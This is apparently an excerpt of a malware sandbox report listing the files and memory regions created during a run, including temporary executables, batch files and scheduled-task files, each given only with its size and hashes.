                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              3KB

                                                                                                                              MD5

                                                                                                                              3f01549ee3e4c18244797530b588dad9

                                                                                                                              SHA1

                                                                                                                              3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                              SHA256

                                                                                                                              36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                              SHA512

                                                                                                                              73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              402c3f48af4b254fd33c130f0639e312

                                                                                                                              SHA1

                                                                                                                              f0668e6a1cfb84b7ad056762299e68ebf5ec2aa7

                                                                                                                              SHA256

                                                                                                                              39c278989a230bf0f6f6082149afb2790675e1774b275ca4f60b34c85b88a1c2

                                                                                                                              SHA512

                                                                                                                              d05ff520e0407fb54ecbefd963f7c2764435742f9162140ff6f4a62ffe9ea3f991183f90c42f71f3531685b34457c7bf6776b923fb74d3da3432736fedddaefb

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              24a83bdf145c47735a76cf78e092ca4b

                                                                                                                              SHA1

                                                                                                                              7f4030b21c119fcfbc107b650bdb66a78e361d15

                                                                                                                              SHA256

                                                                                                                              2411e6ea9c57590079d08d14f6b3cc6e78020f3952ff882bebbed4a703045c9b

                                                                                                                              SHA512

                                                                                                                              8af084744b1bb6afdfe67aed8e003b38a9293f5595641e03313575f0201dd1ac14473c0da8f1ba89a09c9c35adc346fa3ec141b6bbe140f00cdaec19e639f22c

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5fc7b5e7-3f39-4691-a31e-d9c003fcfc3e.exe

                                                                                                                              Filesize

                                                                                                                              163KB

                                                                                                                              MD5

                                                                                                                              1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                              SHA1

                                                                                                                              2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                              SHA256

                                                                                                                              b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                              SHA512

                                                                                                                              859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\87bf4cc7-2d19-4f17-a861-69d4701bc2dd.exe

                                                                                                                              Filesize

                                                                                                                              56KB

                                                                                                                              MD5

                                                                                                                              6f6980e34dfadf2c00047317c6db0f0b

                                                                                                                              SHA1

                                                                                                                              77301f72ac77e790cd967c16fae50c0dc9436f24

                                                                                                                              SHA256

                                                                                                                              79c4e808f4b83f950f7b4bc29d83b4bff8234d544ceba4c3f1d08d75c6f9e2b6

                                                                                                                              SHA512

                                                                                                                              3695ab52cce28d419117abd769c14d312f940e8206540bd9b2183b38f80bc8ce7a71e9f81d5a73f93ef08f74a31d46b0e9caaf68d1ffd7174bfaeea93739bdc8

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\94e0a7f9-2c14-4595-9ac1-213fc6448540.exe

                                                                                                                              Filesize

                                                                                                                              56KB

                                                                                                                              MD5

                                                                                                                              f28f89cc61166c7dcbc9c0895f1f65ed

                                                                                                                              SHA1

                                                                                                                              536979b26034d08c04afb1c6b549a64ff4896bca

                                                                                                                              SHA256

                                                                                                                              8c93c9bbf614e4df3838a14de5c72b568948ae68755755865d97843e97223144

                                                                                                                              SHA512

                                                                                                                              39e9db6f68dad94170952eb48582333b8d92dae7dcd48dcce13e71c08520f9a1377823eb51cbee613abc4439557030742fc4589df6bea7aedfa419e88527d28b

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0o20bxm.s1k.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmpB84.tmp.bat

                                                                                                                              Filesize

                                                                                                                              138B

                                                                                                                              MD5

                                                                                                                              6c1e1fc143066cdd7a82bd16a8dab306

                                                                                                                              SHA1

                                                                                                                              658fae7cbabae3af4c8dec3832629b0bc337a876

                                                                                                                              SHA256

                                                                                                                              4df98d697d00fdbef5297e7084e82cbddaa9d3cbcf8b1a526997cd43fe24faf1

                                                                                                                              SHA512

                                                                                                                              50986ae5cbeb367265986f4dec3d8107cb33e2b28ca1d01e26732f6b5bb8857c6c76d648bdcdb90cc78a30b6c68a4f14eba8afc55402d62db64f0ab74317d616

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmpB94.tmp.bat

                                                                                                                              Filesize

                                                                                                                              138B

                                                                                                                              MD5

                                                                                                                              d2dad44000d3a2c5cdb49d5b7e0c6280

                                                                                                                              SHA1

                                                                                                                              14c2e3adfef081928d071766d663ba29ea9d1595

                                                                                                                              SHA256

                                                                                                                              e4d0c8e9f3838899f3472b6ba49735afc334e9db9a41bc4e492ba36f04220f75

                                                                                                                              SHA512

                                                                                                                              24b394eda29c0f7edd87c5cd8efacb6fa05c6bc7cea50a5df9c7aff76e67557beb8e811b197cf5df2ecfe29b700ce405075850f1c73db75decdf5ac132943931

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                              SHA1

                                                                                                                              98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                              SHA256

                                                                                                                              ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                              SHA512

                                                                                                                              c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              f313c5b4f95605026428425586317353

                                                                                                                              SHA1

                                                                                                                              06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                              SHA256

                                                                                                                              129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                              SHA512

                                                                                                                              b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                              SHA1

                                                                                                                              a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                              SHA256

                                                                                                                              98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                              SHA512

                                                                                                                              1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                              SHA1

                                                                                                                              63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                              SHA256

                                                                                                                              727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                              SHA512

                                                                                                                              f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                              SHA1

                                                                                                                              5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                              SHA256

                                                                                                                              55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                              SHA512

                                                                                                                              5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              0b990e24f1e839462c0ac35fef1d119e

                                                                                                                              SHA1

                                                                                                                              9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                              SHA256

                                                                                                                              a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                              SHA512

                                                                                                                              c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                            • memory/332-171-0x0000021A0CBD0000-0x0000021A0CBFB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/332-172-0x00007FF81F5B0000-0x00007FF81F5C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/332-165-0x0000021A0CBD0000-0x0000021A0CBFB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/512-176-0x00000150BE740000-0x00000150BE76B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/616-139-0x00007FF81F5B0000-0x00007FF81F5C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/616-130-0x000002D2AC1A0000-0x000002D2AC1C5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              148KB

                                                                                                                            • memory/616-138-0x000002D2AC1D0000-0x000002D2AC1FB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/616-131-0x000002D2AC1D0000-0x000002D2AC1FB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/616-132-0x000002D2AC1D0000-0x000002D2AC1FB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/668-150-0x00007FF81F5B0000-0x00007FF81F5C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/668-143-0x000001A5E2E30000-0x000001A5E2E5B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/668-149-0x000001A5E2E30000-0x000001A5E2E5B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/956-154-0x00000289BBB10000-0x00000289BBB3B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/956-160-0x00000289BBB10000-0x00000289BBB3B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/956-161-0x00007FF81F5B0000-0x00007FF81F5C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1748-77-0x0000000004EE0000-0x0000000004F7C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              624KB

                                                                                                                            • memory/1748-75-0x00000000004D0000-0x00000000004E4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              80KB

                                                                                                                            • memory/3496-46-0x00007FF841363000-0x00007FF841365000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3496-94-0x00000199D79A0000-0x00000199D7A35000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              596KB

                                                                                                                            • memory/3496-2-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3496-1-0x00000199BC670000-0x00000199BC708000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              608KB

                                                                                                                            • memory/3496-0-0x00007FF841363000-0x00007FF841365000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3496-51-0x00000199D79A0000-0x00000199D7A35000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              596KB

                                                                                                                            • memory/3496-47-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4344-114-0x0000022CD0FB0000-0x0000022CD0FDA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/4344-115-0x00007FF85F530000-0x00007FF85F725000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/4344-116-0x00007FF85EE20000-0x00007FF85EEDE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/4476-16-0x00000281E3DF0000-0x00000281E3E34000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              272KB

                                                                                                                            • memory/4476-14-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-22-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-19-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-9-0x00000281E37C0000-0x00000281E37E2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/4476-3-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-15-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-18-0x00007FF841360000-0x00007FF841E21000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4476-17-0x00000281E3EC0000-0x00000281E3F36000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              472KB

                                                                                                                            • memory/4500-120-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-119-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-76-0x0000000000490000-0x00000000004A4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              80KB

                                                                                                                            • memory/4500-118-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-127-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-117-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-124-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/4500-125-0x00007FF85F530000-0x00007FF85F725000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/4500-126-0x00007FF85EE20000-0x00007FF85EEDE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB